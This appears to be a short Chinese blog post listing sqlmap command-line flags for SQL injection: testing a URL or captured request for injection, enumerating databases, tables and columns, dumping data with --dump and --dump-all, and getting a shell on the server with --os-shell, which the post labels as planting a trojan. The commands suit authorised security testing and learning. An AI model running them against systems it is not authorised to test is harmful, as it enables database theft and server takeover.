0
点赞
收藏
分享

微信扫一扫

sqlmap命令

进击的铁雾 2022-01-31 阅读 41

1、判断网站是否存在注入


get:sqlmap   -u   “url”

post:sqlmap -r “请求数据包”


2、爆数据库


当前数据库 --current-db

线程 --thread (1-10)

爆所有库 --dbs

指定库 -D

爆所有表 --tables

指定表 -T

爆所有列 --columns

指定列 -C

显示内容 --dump

脱库 --dump-all

挂马 --os-shell

后台特权   --os-shell
 

举报

相关推荐

0 条评论